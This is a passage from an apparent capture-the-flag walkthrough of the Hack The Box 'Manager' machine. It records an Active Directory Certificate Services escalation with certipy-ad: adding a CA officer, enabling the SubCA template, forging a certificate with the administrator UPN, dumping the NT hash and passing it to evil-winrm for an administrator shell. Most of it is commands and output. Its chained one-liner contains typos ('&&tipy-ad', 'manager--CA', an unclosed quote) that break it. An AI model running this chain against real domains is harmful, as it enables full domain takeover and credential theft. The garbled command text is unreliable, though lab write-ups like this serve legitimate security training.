MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : KerberosAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
mspki-certificate-application-policy : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-516
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
MANAGER\Enterprise Read-only Domain ControllersS-1-5-21-4078382237-1492182817-2568127209-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

Following our earlier find, we also came across a weakness in the SubCA template.
To take advantage of this vulnerability, we utilized a tool called ‘certipy-ad.’

‘Certipy-ad’ is a tool designed for managing certificates in an Active Directory environment. It allows you to perform various certificate-related tasks, including creating, requesting, and issuing certificates. Given the presence of ‘certify.exe’ and its potential connection to certificates, I decided to explore ‘certipy-ad’ as a means to escalate my privileges and uncover hidden opportunities within the system.

or you can install certipy-ad with using the command sudo apt install certipy-ad

Next, I used ‘certipy-ad’ to interact with the Active Directory Certificate Services:
Creating an Officer Account: I started by creating an ‘officer’ account with ‘certipy.ad.’ This was essential because it granted me the authority to manage certificates and related operations within the Active Directory. Without this ‘officer’ account, I wouldn’t have the necessary permissions to request and issue certificates or perform any certificate-related task.

certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password '***************'
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'

Enabling a Certificate Template and Requesting a Certificate: Next, I enabled a specific certificate template and requested a certificate with elevated privileges. By doing this, I essentially secured a certificate that would grant me additional access rights, a critical step in the privilege escalation process.

certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username 'raven@manager.htb' -password '**************'
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
certipy-ad req -username 'raven@manager.htb' -password '*************' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn 'administrator@manager.htb'
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 22
Would you like to save the private key? (y/N) y
[*] Saved private key to 22.key
[-] Failed to request certificate

Issuing the Requested Certificate: Once the certificate request was submitted, I needed it to be approved and issued.

certipy-ad ca -ca 'manager-DC01-CA' -issue-request 22 -username raven@manager.htb -password '**************'
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate

Retrieved the Issued Certificate: After the certificate was issued, I retrieved it.This allowed ‘raven’ to have the certificate locally and use it for authentication.

certipy-ad req -username 'raven@manager.htb' -password '***************' -ca 'manager-DC01-CA' -target manager.htb -retrieve 22
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 22
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '22.key'
[*] Saved certificate and private key to 'administrator.pfx'

Authenticated with the obtained certificate;

certipy-ad auth -pfx administrator.pfx -username administrator -domain manager.htb -dc-ip 10.10.11.236
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_BAD_INTEGRITY(Integrity check on decrypted field failed)

if anyone get this type of error, you need to activate a Python virtual environment.

python3 -m venv /home/kali/name
source /home/kali/name/bin/activate

The server resets its settings automatically within a minute, so it’s important to have all the commands ready for quick execution. You can prepare a script or a set of commands that you can quickly copy and paste as needed.

certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username 'raven@manager.htb' -password '*************' && certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username 'raven@manager.htb -password '*********' &&  certipy-ad req -username 'raven@manager.htb' -password '**********' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn 'administrator@manager.htb' &&tipy-ad ca -ca 'manager-DC01-CA' -issue-request 23 -username 'raven@manager.htb' -password '***************' && certipy-ad req -username 'raven@manager.htb' -password '**************' -ca 'manager--CA' -target manager.htb -retrieve 23
certipy auth -pfx administrator.pfx  -dc-ip 10.10.11.236

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[-] Got error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace

However, during this process, I encountered an error related to clock skew. This error, known as ‘KRB_AP_ERR_SKEW’ (Clock skew too great), occurs when there is a significant time difference between the local system and the remote server. In this case, the time skew was too substantial for the Kerberos authentication system to handle, resulting in the error.if you get this type of error, that means you need to sync your time.

to synchronize the system time with the ‘manager.htb’ server use the sudo ntpdate -u manager.htb command. if it didn’t work use timedatectl timedatectl set-ntp 0 and rdate -n 10.10.11.236.

Obtaining Administrator Hash

certipy auth -pfx administrator.pfx  -dc-ip 10.10.11.236

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aa****************:ae***************

After successfully obtaining the Administrator hash, I used it to log in with elevated privileges. I utilized the hash as a password to connect to the system using ‘evil-winrm.’ This allowed me to access the system as the administrator, granting me root-level privileges. As a result, I was able to easily retrieve the root flag.

evil-winrm -i 10.10.11.236 -u administrator -H ae*******************

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*
Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*
Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*
Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/3/2023 5:32 AM 34 root.txt


*
Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
efa2229*
**
*****afd60c069a
*
Evil-WinRM* PS C:\Users\Administrator\Desktop>